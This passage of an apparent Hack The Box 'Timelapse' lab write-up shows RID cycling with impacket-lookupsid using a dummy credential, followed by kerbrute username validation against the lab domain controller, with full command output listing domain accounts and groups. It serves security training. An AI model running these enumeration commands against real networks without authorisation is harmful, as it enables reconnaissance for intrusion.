RID Cycling
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ impacket-lookupsid timelapse.htb/blahblah@dc01.timelapse.htb 100000
Impacket v0.11.0 - Copyright 2023 Fortra
password:
[*] Brute forcing SIDs at dc01.timelapse.htb
[*] stringbinding ncacn_np:dc01.timelapse.htb[\pipe\lsarpc]
[*] domain sid is: S-1-5-21-671920749-559770252-3318990721
498: TIMELAPSE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: TIMELAPSE\Administrator (SidTypeUser)
501: TIMELAPSE\Guest (SidTypeUser)
502: TIMELAPSE\krbtgt (SidTypeUser)
512: TIMELAPSE\Domain Admins (SidTypeGroup)
513: TIMELAPSE\Domain Users (SidTypeGroup)
514: TIMELAPSE\Domain Guests (SidTypeGroup)
515: TIMELAPSE\Domain Computers (SidTypeGroup)
516: TIMELAPSE\Domain Controllers (SidTypeGroup)
517: TIMELAPSE\Cert Publishers (SidTypeAlias)
518: TIMELAPSE\Schema Admins (SidTypeGroup)
519: TIMELAPSE\Enterprise Admins (SidTypeGroup)
520: TIMELAPSE\Group Policy Creator Owners (SidTypeGroup)
521: TIMELAPSE\Read-only Domain Controllers (SidTypeGroup)
522: TIMELAPSE\Cloneable Domain Controllers (SidTypeGroup)
525: TIMELAPSE\Protected Users (SidTypeGroup)
526: TIMELAPSE\Key Admins (SidTypeGroup)
527: TIMELAPSE\Enterprise Key Admins (SidTypeGroup)
553: TIMELAPSE\RAS and IAS Servers (SidTypeAlias)
571: TIMELAPSE\Allowed RODC Password Replication Group (SidTypeAlias)
572: TIMELAPSE\Denied RODC Password Replication Group (SidTypeAlias)
1000: TIMELAPSE\DC01$ (SidTypeUser)
1101: TIMELAPSE\DnsAdmins (SidTypeAlias)
1102: TIMELAPSE\DnsUpdateProxy (SidTypeGroup)
1601: TIMELAPSE\thecybergeek (SidTypeUser)
1602: TIMELAPSE\payl0ad (SidTypeUser)
1603: TIMELAPSE\legacyy (SidTypeUser)
1604: TIMELAPSE\sinfulz (SidTypeUser)
1605: TIMELAPSE\babywyrm (SidTypeUser)
1606: TIMELAPSE\DB01$ (SidTypeUser)
1607: TIMELAPSE\WEB01$ (SidTypeUser)
1608: TIMELAPSE\DEV01$ (SidTypeUser)
2601: TIMELAPSE\LAPS_Readers (SidTypeGroup)
3101: TIMELAPSE\Development (SidTypeGroup)
3102: TIMELAPSE\HelpDesk (SidTypeGroup)
3103: TIMELAPSE\svc_deploy (SidTypeUser)
5101: TIMELAPSE\TRX (SidTypeUser)performing the rid cycling attack with an arbitrary credential, blahblah, against the target SMB service
Domain Users
The found domain users have been saved into a file; users.txt
Additionally, some of them appear to be machine accounts
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ kerbrute userenum --dc dc01.timelapse.htb -d TIMELAPSE.HTB ./users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 10/24/23 - Ronnie Flathers @ropnop
2023/10/24 17:48:39 > Using KDC(s):
2023/10/24 17:48:39 > dc01.timelapse.htb:88
2023/10/24 17:48:39 > [+] VALID USERNAME: Administrator@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: DC01$@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: legacyy@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: DB01$@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: WEB01$@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: payl0ad@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: sinfulz@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: babywyrm@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: Guest@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: thecybergeek@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: svc_deploy@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: TRX@TIMELAPSE.HTB
2023/10/24 17:48:39 > [+] VALID USERNAME: DEV01$@TIMELAPSE.HTB
2023/10/24 17:48:39 > Done! Tested 13 usernames (13 valid) in 0.415 secondsAll 13 domain users are confirmed to be valid
Domain Group
The following is the none default domain group;
LAPS_ReadersDevelopmentHelpDesk